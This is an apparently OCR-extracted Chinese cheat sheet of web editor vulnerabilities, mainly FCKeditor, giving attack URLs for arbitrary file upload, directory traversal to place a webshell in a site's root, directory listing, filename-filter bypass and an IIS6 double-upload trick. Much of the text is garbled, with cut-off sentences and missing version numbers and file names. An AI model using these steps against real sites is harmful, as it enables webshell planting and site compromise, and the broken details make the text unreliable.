网页编辑器漏洞大全.doc

网页编辑器漏洞大全
涵盖了诸如常见的 FCKeditor、eWebEditor、
Cuteditor、Freetextbox> Webhtmleditor> Kindeditor、 所谓的 eWebEditorNET、所谓的 south
攻击利用：
fckeditor/editor/filemanager/browser/default/?Type=lmage&Connector=connector
s/asp/
影响版本：FCKeditor <= FCKeditor
脆弱描述：
FCKeditor在处理文件上传时存在输入验证错误，远程攻击可以利用此漏洞上传任意文件。
在通过editor/filemanager/upload/php/ 义无效的值导致上传任意脚本。
，而默认是禁用的。
攻击利用：（请修改action字段为指定网址）：
Fckeditor《二2一 4. 2 For php. html
TYPE自定义变量任意上传文件漏洞
影响版本：较早版本
脆弱描述：
通过自定义Type变量的参数，可以创建或上传文件到指定的目录中去，且没有上传文件格 式的限制。
攻击利用：
/FCKeditor/editor/filemanager/browser/default/?Type=all&Connector=connectors/ asp/
打开这个地址就可以上传任何类型的文件了，Shell上传到的默认位置是：

,,Type=air,这个变量是自定义的，在这里创建了 all这个目录，而且新的目录没有上传文件格式 的限制.
比如输入：
/FCKeditor/editor/filemanager/browser/default/?Type=../&Connector=connectors/
asp/
网马就可以传到网站的根目录下.
FCKeditor新闻组件遍历目录漏洞
影响版本:aspx版FCKeditor,其余版本未测试
脆弱描述：如何获得***请参考上文"TYPE自定义变量任意上传文件漏洞”
攻击利用：
修改CurrentFolder参数使用来进入不同的目录
/browser/default/connectors/aspx/?Command=CreateFolder&Type=lmage&Curre
ntFolder=.%2F&NewFolderName=
根据返回的XML信息可以查看网站所有的目录。
/browser/default/connectors/aspx/?Command=GetFoldersAndFiles&Type=lmage
&CurrentFolder=%2F
影响版本:非优化/精简版本的FCKeditor
脆弱描述：
如果存在以下文件，打开后即可上传文件。
攻击利用：
fckeditor/editor/filemanager/upload/
fckeditor/editor/filemanager/browser/default/connectors/
FCKeditor文件上传变七”下划线的绕过方法:
影响版本:FCKeditor =>
脆弱描述：
我们上传的文件例如:;.jpg会变为shell_php;.jpg这是新版FCK的变
化。
攻击利用：
+空格就可以绕过去所有的，
※不过空格只支持win系统*nix是不支持的［+空格是2个不同的文件］
FCKeditor二次上传漏洞
影响版本:=>
脆弱描述：
来源:
;。也就是IIS6解析漏洞。
上传第一次。被过滤为123_asp;。
;。由于"123_asp;”已经存在。
;123(l).jpg……;123(2).jpg这样的编号方式。